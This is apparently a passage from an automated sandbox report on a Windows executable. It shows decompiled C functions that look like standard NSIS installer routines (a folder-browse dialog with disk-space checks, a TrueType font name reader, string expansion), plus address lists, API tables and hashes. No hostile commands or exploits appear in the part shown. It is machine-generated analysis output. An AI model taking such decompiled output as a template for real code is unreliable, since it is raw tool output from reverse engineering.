				}
			}

0x004049c9
0x004049cc
0x004049ce
0x004049d4
0x004049dc
0x004049e9
0x004049f4
0x004049f7
0x004049f8
0x00404c18
0x00404c1f
0x00404c21
0x00404c24
0x00404c2b
0x00404c2b
0x00404c3b
0x00404c46
0x00404c4c
0x00404c65
0x00404ce0
0x00404ce2
0x00404ceb
0x00404cf9
0x00404cf9
0x00404d02
0x00404d07
0x00404d14
0x00404d18
0x00404d1f
0x00404d1a
0x00404d1a
0x00404d1a
0x00404d18
0x00404d02
0x00000000
0x00404ce2
0x00404c6a
0x00404c75
0x00404c7a
0x00404c81
0x00404c88
0x00404c95
0x00404c95
0x00404c99
0x00404c9e
0x00404ca3
0x00404cb9
0x00404ca5
0x00404ca5
0x00404cad
0x00404cb4
0x00404caf
0x00404caf
0x00404caf
0x00404cad
0x00404cbd
0x00404cbf
0x00404cce
0x00404cd3
0x00404cd6
0x00404cd9
0x00404cd9
0x00404c9e
0x00000000
0x00404c88
0x00404c6c
0x00404c73
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00404d22
0x00404d22
0x00404d29
0x00404da0
0x00404da7
0x00404db3
0x00404db3
0x00404dbc
0x00404dbe
0x00404dc5
0x00404dc8
0x00404dc8
0x00404dce
0x00404dd5
0x00404dd8
0x00404dd8
0x00404dde
0x00404de4
0x00404dea
0x00404dea
0x00404df7
0x00404f48
0x00404f4f
0x00404f6f
0x00404f75
0x00404f87
0x00404f87
0x00000000
0x00404dfd
0x00404dff
0x00404e07
0x00404e0b
0x00404e0b
0x00404e13
0x00404e54
0x00404e56
0x00404e60
0x00404e63
0x00404e68
0x00404e6f
0x00404e78
0x00404f1f
0x00404f25
0x00404f33
0x00404f43
0x00404f43
0x00000000
0x00404f33
0x00404e7e
0x00404e81
0x00404e87
0x00404e8c
0x00404e8e
0x00404e90
0x00404e93
0x00404ea0
0x00404ea5
0x00404eac
0x00404eaf
0x00404eaf
0x00404eb8
0x00404ec4
0x00404ec8
0x00404eca
0x00404eca
0x00404eba
0x00404ebc
0x00404ebc
0x00404ef3
0x00404ef6
0x00404f05
0x00404f05
0x00404f07
0x00404f0d
0x00404f13
0x00000000
0x00404e15
0x00404e20
0x00404e23
0x00404e28
0x00404e2a
0x00404e2e
0x00404e3e
0x00404e48
0x00404e4a
0x00404e4d
0x00000000
0x00000000
0x00000000
0x00000000
0x00404e30
0x00404e30
0x00404e36
0x00404e38
0x00404e38
0x00404e39
0x00404e3a
0x00000000
0x00404e30
0x00404e13
0x00404df7
0x00404d34
0x00000000
0x00404d4a
0x00404d54
0x00404d59
0x00000000
0x00000000
0x00404d6b
0x00404d70
0x00404d7c
0x00404d7c
0x00404d7e
0x00404d8d
0x00404d8f
0x00404d96
0x00404d99
0x00000000
0x00404d99
0x00404d34
0x004049fe
0x00404a01
0x00404a11
0x00404a14
0x00404a29
0x00404a2e
0x00404a34
0x00404a45
0x00404a55
0x00404a5a
0x00404a68
0x00404a6e
0x00404a84
0x00404a94
0x00404aa0
0x00404aa0
0x00404aa5
0x00404aab
0x00404aad
0x00404ab0
0x00404ab5
0x00404aba
0x00404abc
0x00404abc
0x00404adc
0x00404adc
0x00404ade
0x00404adf
0x00404ae7
0x00404aea
0x00404aee
0x00404af3
0x00404afb
0x00404aff
0x00404b04
0x00404b09
0x00404b0b
0x00404b14
0x00404bd6
0x00404bea
0x00000000
0x00404b1a
0x00404b20
0x00404b28
0x00404b28
0x00404b2b
0x00404b32
0x00000000
0x00000000
0x00404b3b
0x00404b3e
0x00404b42
0x00404b45
0x00404b4a
0x00404b51
0x00404b58
0x00404b5b
0x00404b5e
0x00404b63
0x00404b91
0x00404bb1
0x00000000
0x00404bb1
0x00404ba2
0x00404b65
0x00404b6f
0x00404b76
0x00404b7d
0x00404b7f
0x00404b82
0x00404bb3
0x00404bb3
0x00404bb9
0x00404bb9
0x00404bbc
0x00404bbc
0x00404bc3
0x00404bc4
0x00404bd4
0x00404bf0
0x00404bf4
0x00404c11
0x00404c16
0x00000000
0x00404c16
0x00404bfb
0x00404c04
0x00404f89
0x00404f9b
0x00404f9b
0x00000000
0x00404bd4
0x00404b14

APIs

GetDlgItem.USER32 ref: 004049BF
GetDlgItem.USER32 ref: 004049CC
GlobalAlloc.KERNEL32(00000040,?), ref: 00404A1B
LoadBitmapW.USER32 ref: 00404A2E
SetWindowLongW.USER32 ref: 00404A48
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A5A
ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A6E
SendMessageW.USER32(?,00001109,00000002), ref: 00404A84
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A90
SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404AA0
DeleteObject.GDI32(?), ref: 00404AA5
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AD0
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404ADC
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B7D
SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404BA0
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404BB1
GetWindowLongW.USER32(?,000000F0), ref: 00404BDB
SetWindowLongW.USER32 ref: 00404BEA
ShowWindow.USER32(?,00000005), ref: 00404BFB
SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CF9
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D54
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D69
SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D8D
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404DB3
ImageList_Destroy.COMCTL32(?), ref: 00404DC8
GlobalFree.KERNEL32 ref: 00404DD8
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E48
SendMessageW.USER32(?,00001102,?,?), ref: 00404EF6
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404F05
InvalidateRect.USER32(?,00000000,00000001), ref: 00404F25
ShowWindow.USER32(?,00000000), ref: 00404F75
GetDlgItem.USER32 ref: 00404F80
ShowWindow.USER32(00000000), ref: 00404F87

Strings

M, xrefs: 00404B6F
N, xrefs: 00404C32
, xrefs: 00404F65
@, xrefs: 00404BBC

Memory Dump Source

Source File: 0000000D.00000002.385407365.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.385394869.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.385426913.0000000000409000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.385438977.000000000040C000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385450587.0000000000420000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385493977.000000000046B000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385514327.0000000000560000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $ @$M$N
API String ID: 1638840714-3479655940
Opcode ID: 232f7ad113cb9ac5efd1b23bb694dfa7ac126bc5f1dc1702430156d0733604ca
Instruction ID: ef4bce446953bc7ec7e60756d12a1063aab4f745b4df8f164389f1335a379dc2
Opcode Fuzzy Hash: 232f7ad113cb9ac5efd1b23bb694dfa7ac126bc5f1dc1702430156d0733604ca
Instruction Fuzzy Hash: 7B028DB090020AAFEF109F95CD45AAE7BB5FB84314F10417AF611BA2E1C7B89D91CF58

Uniqueness

Uniqueness Score: -1.00%

Function 004044D1, Relevance: 30.0, APIs: 15, Strings: 2, Instructions: 300
stringkeyboardCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E004044D1(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				struct HWND__* _v12;
				long _v16;
				long _v20;
				char _v24;
				long _v28;
				char _v32;
				intOrPtr _v36;
				long _v40;
				signed int _v44;
				WCHAR* _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				WCHAR* _v68;
				void _v72;
				char _v76;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t86;
				long _t91;
				short* _t93;
				void* _t99;
				signed int _t100;
				void* _t120;
				void* _t125;
				signed int _t126;
				char* _t131;
				intOrPtr* _t146;
				struct HWND__* _t150;
				signed int _t160;
				short* _t161;
				struct HWND__* _t162;
				signed int _t165;
				signed int _t173;
				intOrPtr _t179;
				WCHAR* _t183;
				int _t184;

				_t86 =  *0x461db8;
				_v36 = _t86;
				_t183 = 0x47f000 +  *(_t86 + 0x3c) * 0x4008;
				_v8 =  *((intOrPtr*)(_t86 + 0x38));
				if(_a8 != 0x40b) {
					L3:
					if(_a8 != 0x110) {
						L12:
						if(_a8 != 0x111) {
							L24:
							if(_a8 == 0x40f) {
								L26:
								_v8 = _v8 & 0x00000000;
								_v12 = _v12 & 0x00000000;
								E00405CB0(0x3fb, _t183);
								if(E004067AA(_t203, _t183) == 0) {
									_v8 = 1;
								}
								E00406035(0x44dd90, _t183);
								_t160 = 0;
								_t91 = E00406328(0);
								_v16 = _t91;
								if(_t91 == 0) {
									L35:
									E00406035(0x44dd90, _t183);
									_t93 = E00405D85(0x44dd90);
									if(_t93 != _t160) {
										 *_t93 = 0;
									}
									if(GetDiskFreeSpaceW(0x44dd90,  &_v20,  &_v28,  &_v16,  &_v40) == 0) {
										_t173 = _a4;
										goto L41;
									} else {
										_t184 = 0x400;
										_t173 = MulDiv(_v20 * _v28, _v16, 0x400);
										_v12 = 1;
										goto L42;
									}
								} else {
									if(0 == 0x44dd90) {
										L34:
										_t160 = 0;
										goto L35;
									} else {
										goto L30;
									}
									while(1) {
										L30:
										_t120 = _v16(0x44dd90,  &_v44,  &_v24,  &_v32);
										if(_t120 != 0) {
											break;
										}
										if(_t160 != 0) {
											 *_t160 = _t120;
										}
										_t161 = E0040677D(0x44dd90);
										 *_t161 = 0;
										_t160 = _t161 - 2;
										_t125 = 0x5c;
										 *_t160 = _t125;
										if(_t160 != 0x44dd90) {
											continue;
										} else {
											goto L34;
										}
									}
									_t173 = (_v40 << 0x00000020 | _v44) >> 0xa;
									_v12 = 1;
									_t160 = 0;
									L41:
									_t184 = 0x400;
									L42:
									_t99 = E004044A2(5);
									if(_v12 != _t160 && _t173 < _t99) {
										_v8 = 2;
									}
									if( *((intOrPtr*)( *0x476a88 + 0x10)) != _t160) {
										E004043D9(_t99, 0x3ff, 0xfffffffb);
										if(_v12 == _t160) {
											SetDlgItemTextW(_a4, _t184, 0x40a264);
										} else {
											E004043D9(_t173, _t184, 0xfffffffc);
										}
									}
									_t100 = _v8;
									 *0x47eb84 = _t100;
									if(_t100 == _t160) {
										_v8 = E0040141D(7);
									}
									if(( *(_v36 + 0x14) & _t184) != 0) {
										_v8 = _t160;
									}
									E00403DB1(0 | _v8 == _t160);
									if(_v8 == _t160 &&  *0x441d5c == _t160) {
										E00403D8D();
									}
									 *0x441d5c = _t160;
									goto L57;
								}
							}
							_t203 = _a8 - 0x405;
							if(_a8 != 0x405) {
								goto L57;
							}
							goto L26;
						}
						_t126 = _a12 & 0x0000ffff;
						if(_t126 != 0x3fb) {
							L16:
							if(_t126 == 0x3e9) {
								_t165 = 7;
								memset( &_v72, 0, _t165 << 2);
								_v76 = _a4;
								_v68 = 0x451d98;
								_v56 = E00403F90;
								_v52 = _t183;
								_v64 = E00406831(0x3fb, 0x451d98, _t183, 0x441d78, _v8);
								_t131 =  &_v76;
								_v60 = 0x41;
								__imp__SHBrowseForFolderW(_t131);
								if(_t131 == 0) {
									_a8 = 0x40f;
								} else {
									__imp__CoTaskMemFree(_t131);
									E0040674E(_t183);
									_t134 =  *((intOrPtr*)( *0x47eabc + 0x11c));
									if( *((intOrPtr*)( *0x47eabc + 0x11c)) != 0 && _t183 == 0x4d30a8) {
										E00406831(0x3fb, 0x451d98, _t183, 0, _t134);
										if(lstrcmpiW(0x46e220, 0x451d98) != 0) {
											lstrcatW(_t183, 0x46e220);
										}
									}
									 *0x441d5c =  *0x441d5c + 1;
									SetDlgItemTextW(_a4, 0x3fb, _t183);
								}
							}
							goto L24;
						}
						if(_a12 >> 0x10 != 0x300) {
							goto L57;
						}
						_a8 = 0x40f;
						goto L16;
					} else {
						_v12 = GetDlgItem(_a4, 0x3fb);
						if((0x00008000 & GetAsyncKeyState(0x10)) == 0) {
							_t162 = _a4;
						} else {
							_t162 = _a4;
							_t150 = GetDlgItem(_t162, 0x3f0);
							_push(0xffffffe0);
							_push(8);
							E00403D6B(_t162);
							ShowWindow(_t150, 8);
						}
						if(E00405D51(_t183) != 0 && E00405D85(_t183) == 0) {
							E0040674E(_t183);
						}
						 *0x476a68 = _t162;
						SetWindowTextW(_v12, _t183);
						_t179 = _a16;
						_push( *((intOrPtr*)(_t179 + 0x34)));
						_push(1);
						E00403D6B(_t162);
						_push( *((intOrPtr*)(_t179 + 0x30)));
						_push(0x14);
						E00403D6B(_t162);
						E00403DC4(_v12);
						_t146 = E00406328(7);
						if(_t146 == 0) {
							L57:
							return E00403DF6(_a8, _a12, _a16);
						}
						 *_t146(_v12, 1);
						goto L12;
					}
				}
				E00405CB0(0x3fb, _t183);
				E00406064(_t183);
				E00403EA0();
				if(GetDlgItem(_a4, 0x3f0) == 0) {
					goto L57;
				} else {
					 *0x46d204 = IsDlgButtonChecked(_a4, 0x3f0);
					goto L3;
				}
			}

0x004044d7
0x004044e7
0x004044ed
0x00404501
0x00404509
0x0040453e
0x00404545
0x004045ec
0x004045f8
0x004046d0
0x004046d7
0x004046e6
0x004046e6
0x004046ea
0x004046f0
0x004046fd
0x004046ff
0x004046ff
0x0040470d
0x00404712
0x00404715
0x0040471a
0x0040471f
0x0040475e
0x00404760
0x00404766
0x0040476d
0x00404771
0x00404771
0x0040478d
0x004047c9
0x00000000
0x0040478f
0x00404796
0x004047a6
0x004047a8
0x00000000
0x004047a8
0x00404721
0x00404725
0x0040475c
0x0040475c
0x00000000
0x00000000
0x00000000
0x00000000
0x00404727
0x00404727
0x00404734
0x00404739
0x00000000
0x00000000
0x0040473d
0x0040473f
0x0040473f
0x00404748
0x0040474c
0x0040474f
0x00404754
0x00404755
0x0040475a
0x00000000
0x00000000
0x00000000
0x00000000
0x0040475a
0x004047b7
0x004047be
0x004047c5
0x004047cc
0x004047cc
0x004047d1
0x004047d3
0x004047db
0x004047e1
0x004047e1
0x004047f1
0x004047fa
0x00404802
0x00404819
0x00404804
0x00404809
0x00404809
0x00404802
0x0040481e
0x00404821
0x00404828
0x00404831
0x00404831
0x0040483a
0x0040483c
0x0040483c
0x00404848
0x00404850
0x0040485a
0x0040485a
0x0040485f
0x00000000
0x0040485f
0x0040471f
0x004046d9
0x004046e0
0x00000000
0x00000000
0x00000000
0x004046e0
0x004045fe
0x00404604
0x00404621
0x00404626
0x0040462e
0x00404637
0x00404646
0x00404649
0x0040464c
0x00404653
0x0040465b
0x0040465e
0x00404662
0x00404669
0x00404671
0x004046c9
0x00404673
0x00404674
0x0040467b
0x00404685
0x0040468d
0x0040469a
0x004046ae
0x004046b2
0x004046b2
0x004046ae
0x004046b7
0x004046c2
0x004046c2
0x00404671
0x00000000
0x00404626
0x00404614
0x00000000
0x00000000
0x0040461a
0x00000000
0x0040454b
0x00404557
0x00404568
0x00404588
0x0040456a
0x0040456b
0x0040456f
0x00404571
0x00404573
0x00404578
0x00404580
0x00404580
0x00404593
0x004045a0
0x004045a0
0x004045a9
0x004045af
0x004045b5
0x004045b8
0x004045bb
0x004045be
0x004045c3
0x004045c6
0x004045c9
0x004045d1
0x004045d8
0x004045df
0x00404865
0x00404877
0x00404877
0x004045ea
0x00000000
0x004045ea
0x00404545
0x00404511
0x00404517
0x0040451c
0x00404529
0x00000000
0x0040452f
0x00404539
0x00000000
0x00404539

APIs

GetDlgItem.USER32 ref: 00404525
IsDlgButtonChecked.USER32(?,000003F0), ref: 00404533
GetDlgItem.USER32 ref: 00404553
GetAsyncKeyState.USER32(00000010), ref: 0040455A
GetDlgItem.USER32 ref: 0040456F
ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404580
SetWindowTextW.USER32(?,?), ref: 004045AF
SHBrowseForFolderW.SHELL32(?), ref: 00404669
lstrcmpiW.KERNEL32(0046E220,00451D98,00000000,?,?), ref: 004046A6
lstrcatW.KERNEL32(?,0046E220), ref: 004046B2
SetDlgItemTextW.USER32 ref: 004046C2
CoTaskMemFree.OLE32(00000000), ref: 00404674

Part of subcall function 00405CB0: GetDlgItemTextW.USER32 ref: 00405CC3

Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF

Part of subcall function 00403EA0: lstrcatW.KERNEL32(00000000,00000000), ref: 00403EBB

GetDiskFreeSpaceW.KERNEL32(0044DD90,?,?,0000040F,?,0044DD90,0044DD90,?,00000000,0044DD90,?,?,000003FB,?), ref: 00404785
MulDiv.KERNEL32(?,0000040F,00000400), ref: 004047A0

Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00424E27,7519EA30,00000000), ref: 00406902

SetDlgItemTextW.USER32 ref: 00404819

Strings

F, xrefs: 004046A0
A, xrefs: 00404662

Memory Dump Source

Source File: 0000000D.00000002.385407365.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.385394869.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.385426913.0000000000409000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.385438977.000000000040C000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385450587.0000000000420000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385493977.000000000046B000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385514327.0000000000560000.00000002.00020000.sdmp Download File

Similarity

API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
String ID: F$A
API String ID: 3347642858-1281894373
Opcode ID: daaa1e0cefc3b075cc9d96c46cb806b6c5f306674e01b7aa8aee38c956bc084c
Instruction ID: 610cab7253faed09e83e35c18a41c8795a2522a57bd741f73bb79fe4ae4f2c97
Opcode Fuzzy Hash: daaa1e0cefc3b075cc9d96c46cb806b6c5f306674e01b7aa8aee38c956bc084c
Instruction Fuzzy Hash: A3B181B1900209BBDB11AFA1CC85AAF7BB8EF45315F10843BFA05B72D1D77C9A418B59

Uniqueness

Uniqueness Score: -1.00%

Function 00406EFE, Relevance: 30.0, APIs: 14, Strings: 3, Instructions: 270
filestringCOMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E00406EFE(WCHAR* _a4, intOrPtr _a8, WCHAR* _a12, int _a16) {
				struct _OVERLAPPED* _v8;
				void* _v12;
				long _v16;
				struct _OVERLAPPED* _v20;
				struct _OVERLAPPED* _v24;
				char _v28;
				signed short _v32;
				signed short _v34;
				void _v36;
				signed short _v44;
				signed int _v46;
				void _v48;
				signed short _v54;
				signed int _v56;
				signed short _v58;
				signed int _v60;
				void _v64;
				unsigned int _v68;
				unsigned int _v72;
				char _v80;
				void* _t93;
				signed short _t102;
				long _t125;
				signed short _t133;
				signed short _t140;
				void* _t149;
				signed char* _t155;
				struct _OVERLAPPED* _t158;
				signed short _t166;
				signed short _t202;
				signed short _t234;
				signed short _t236;
				signed int _t238;
				void* _t240;

				_t158 = 0;
				_v20 = 0;
				_v16 = 0;
				_t93 = CreateFileW(_a4, 0x80000000, 1, 0, 3, 0x80, 0);
				_v12 = _t93;
				if(_t93 != 0xffffffff) {
					ReadFile(_t93,  &_v48, 0xc,  &_v16, 0);
					_t234 = _v44 >> 0x00000008 & 0x000000ff | (_v44 & 0x000000ff) << 0x00000008;
					_t102 = _v48 >> 0x00000008 & 0x000000ff | (_v48 & 0x000000ff) << 0x00000008;
					_v44 = _t234;
					_t166 = _v46 >> 0x00000008 & 0x000000ff | (_v46 & 0x000000ff) << 0x00000008;
					_v48 = _t102;
					_v46 = _t166;
					if(_t102 != 1 || _t166 != 0) {
						return 0;
					} else {
						_v8 = 0;
						if(0 >= _t234) {
							L17:
							CloseHandle(_v12);
							L18:
							return _v20;
						} else {
							goto L5;
						}
						while(1) {
							L5:
							ReadFile(_v12,  &_v80, 0x10,  &_v16, _t158);
							lstrcpynA( &_v28,  &_v80, 5);
							_v24 = _t158;
							if(lstrcmpA("name",  &_v28) == 0) {
								break;
							}
							_v8 =  &(_v8->Internal);
							if(_v8 < (_v44 & 0x0000ffff)) {
								continue;
							}
							goto L17;
						}
						_v68 = ((_v68 & 0x000000ff) << 0x00000008 & 0x0000ffff | _v68 >> 0x00000008 & 0x000000ff) << 0x00000010 | (_v68 >> 0x00000010 & 0x000000ff) << 0x00000008 & 0x0000ffff | _v68 >> 0x00000010 >> 0x00000008 & 0x000000ff;
						_t125 = ((_v72 & 0x000000ff) << 0x00000008 & 0x0000ffff | _v72 >> 0x00000008 & 0x000000ff) << 0x00000010 | (_v72 >> 0x00000010 & 0x000000ff) << 0x00000008 & 0x0000ffff | _v72 >> 0x00000010 >> 0x00000008 & 0x000000ff;
						_v72 = _t125;
						SetFilePointer(_v12, _t125, _t158, _t158);
						ReadFile(_v12,  &_v36, 6,  &_v16, _t158);
						_t133 = _v34 >> 0x00000008 & 0x000000ff | (_v34 & 0x000000ff) << 0x00000008;
						_v32 = _v32 >> 0x00000008 & 0x000000ff | (_v32 & 0x000000ff) << 0x00000008;
						_v34 = _t133;
						_v8 = _t158;
						if(0 >= _t133) {
							goto L17;
						} else {
							goto L9;
						}
						while(1) {
							L9:
							ReadFile(_v12,  &_v64, 0xc,  &_v16, _t158);
							_t140 = _v58 >> 0x00000008 & 0x000000ff | (_v58 & 0x000000ff) << 0x00000008;
							_v64 = _v64 >> 0x00000008 & 0x000000ff | (_v64 & 0x000000ff) << 0x00000008;
							_v58 = _t140;
							_v60 = _v60 >> 0x00000008 & 0x000000ff | (_v60 & 0x000000ff) << 0x00000008;
							_t236 = _v56 >> 0x00000008 & 0x000000ff | (_v56 & 0x000000ff) << 0x00000008;
							_t202 = _v54 >> 0x00000008 & 0x000000ff | (_v54 & 0x000000ff) << 0x00000008;
							_v56 = _t236;
							_v54 = _t202;
							if((_t140 & 0x0000ffff) == _a8 && _v64 == 3 && _v60 == 0x409) {
								break;
							}
							_v8 =  &(_v8->Internal);
							if(_v8 < (_v34 & 0x0000ffff)) {
								continue;
							}
							goto L17;
						}
						_t238 = (_t236 & 0x0000ffff) >> 1;
						SetFilePointer(_v12, (_v32 & 0x0000ffff) + (_t202 & 0x0000ffff) + _v72, _t158, _t158);
						_t149 = GlobalAlloc(0x40, (_v56 & 0x0000ffff) + 2);
						_v8 = _t149;
						ReadFile(_v12, _t149, _v56 & 0x0000ffff,  &_v16, _t158);
						if(_t238 <= _t158) {
							L16:
							_t240 = _v8;
							 *((short*)(_t240 + _t238 * 2)) = 0;
							lstrcpynW(_a12, _t240, _a16);
							_v20 = 1;
							GlobalFree(_t240);
							goto L17;
						} else {
							goto L15;
						}
						do {
							L15:
							_t155 = _v8 + _t158 * 2;
							_t158 =  &(_t158->Internal);
							 *_t155 = _t155[1] & 0x000000ff | ( *_t155 & 0x000000ff) << 0x00000008;
						} while (_t158 < _t238);
						goto L16;
					}
				}
				_push(_a4);
				E004062CF(L"%s: failed opening file \"%s\"\n", L"GetTTFNameString");
				goto L18;
			}

0x00406f07
0x00406f1c
0x00406f1f
0x00406f22
0x00406f28
0x00406f2e
0x00406f5c
0x00406f77
0x00406f87
0x00406f8a
0x00406f9b
0x00406f9e
0x00406fa2
0x00406faa
0x00000000
0x00406fb9
0x00406fbb
0x00406fc1
0x0040720f
0x00407212
0x00407218
0x00000000
0x00000000
0x00000000
0x00000000
0x00406fc7
0x00406fc7
0x00406fd5
0x00406fe1
0x00406ff0
0x00406ffb
0x00000000
0x00000000
0x00407001
0x00407007
0x00000000
0x00000000
0x00000000
0x00407009
0x0040704f
0x00407076
0x0040707d
0x00407080
0x00407094
0x004070ab
0x004070be
0x004070c4
0x004070c8
0x004070ce
0x00000000
0x00000000
0x00000000
0x00000000
0x004070d4
0x004070d4
0x004070e2
0x004070f9
0x00407110
0x00407114
0x0040712c
0x00407141
0x00407154
0x00407157
0x0040715b
0x00407162
0x00000000
0x00000000
0x0040717a
0x00407180
0x00000000
0x00000000
0x00000000
0x00407186
0x004071a0
0x004071a2
0x004071b2
0x004071c6
0x004071c9
0x004071cd
0x004071eb
0x004071ee
0x004071f7
0x004071fb
0x00407202
0x00407209
0x00000000
0x00000000
0x00000000
0x00000000
0x004071cf
0x004071cf
0x004071d2
0x004071e3
0x004071e4
0x004071e7
0x00000000
0x004071cf
0x00406faa
0x00406f30
0x00406f3d
0x00000000

APIs

CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F5C
ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FD5
lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FE1
lstrcmpA.KERNEL32(name,?), ref: 00406FF3
CloseHandle.KERNEL32(?), ref: 00407212

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory("C:\Users\user\AppData\Local\Temp\nsg8FBB.tmp\"),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

Strings

GetTTFNameString, xrefs: 00406F33
name, xrefs: 00406FEB
%s: failed opening file "%s", xrefs: 00406F38

Memory Dump Source

Source File: 0000000D.00000002.385407365.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.385394869.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.385426913.0000000000409000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.385438977.000000000040C000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385450587.0000000000420000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385493977.000000000046B000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385514327.0000000000560000.00000002.00020000.sdmp Download File

Similarity

API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
String ID: %s: failed opening file "%s"$GetTTFNameString$name
API String ID: 1916479912-1189179171
Opcode ID: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
Instruction ID: 0b41acfa2c3272d6dc61f6848418d9961a63ce1f0aee58dce5ac99f5834af97b
Opcode Fuzzy Hash: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
Instruction Fuzzy Hash: 8491CB70D1412DAADF05EBE5C9908FEBBBAEF58301F00406AF592F7290E2385A05DB75

Uniqueness

Uniqueness Score: -1.00%

Function 00406831, Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 212
stringCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E00406831(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				struct _ITEMIDLIST* _v8;
				signed short* _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _t46;
				WCHAR* _t47;
				signed int _t49;
				signed int _t50;
				signed int _t55;
				long _t65;
				signed int _t66;
				long _t68;
				signed int _t71;
				void* _t81;
				signed int _t84;
				signed short* _t88;
				signed int _t95;
				short _t96;
				void* _t103;
				WCHAR* _t104;
				void* _t106;
				signed int _t113;
				signed int _t115;
				void* _t116;

				_t106 = __esi;
				_t103 = __edi;
				_t81 = __ebx;
				_t46 = _a8;
				if(_t46 < 0) {
					_t46 =  *( *0x476a88 - 4 + _t46 * 4);
				}
				_t88 =  *0x47ead8 + _t46 * 2;
				_t47 = 0x46e220;
				_push(_t103);
				_t104 = 0x46e220;
				if(_a4 >= 0x46e220 && _a4 - 0x46e220 >> 1 < 0x4008) {
					_t104 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				_t95 =  *_t88 & 0x0000ffff;
				if(_t95 == 0) {
					L51:
					 *_t104 = 0;
					if(_a4 == 0) {
						return _t47;
					}
					return E00406035(_a4, _t47);
				} else {
					_push(_t81);
					_push(_t106);
					while((_t104 - _t47 & 0xfffffffe) < 0x4008) {
						_t96 = _t95 & 0x0000ffff;
						_t88 =  &(_t88[1]);
						_a8 = _t96;
						if((0x0000e000 & _t96) == 0) {
							__eflags = _t96 - 0xe000;
							L46:
							if(__eflags != 0) {
								 *_t104 = _t96;
								_t104 =  &(_t104[1]);
								__eflags = _t104;
							} else {
								 *_t104 =  *_t88;
								_t104 =  &(_t104[1]);
								_t88 =  &(_t88[1]);
							}
							L49:
							_t95 =  *_t88 & 0x0000ffff;
							if(_t95 != 0) {
								continue;
							}
							break;
						}
						if(_t96 <= 0xe000) {
							goto L46;
						}
						_t49 =  *_t88 & 0x0000ffff;
						_t50 = _t49 >> 8;
						_t84 = _t49 & 0x000000ff;
						_v16 = _t50;
						_v20 = _t50 | 0x00008000;
						_t113 = _t49 & 0x00007fff;
						_v24 = _t84;
						_v28 = _t84 | 0x00008000;
